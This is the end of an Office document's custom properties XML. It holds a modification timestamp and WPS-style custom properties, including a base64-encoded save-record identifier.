  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-10T05:53:11Z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F393F356EC0542E8A2F01D2CFBC84BF6_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiYmI2ZmFlMjU2NjZlNmE4ZDU3NjExNGMzZGQ2OTZkYzkifQ==</vt:lpwstr>
  </property>
</Properties>
</file>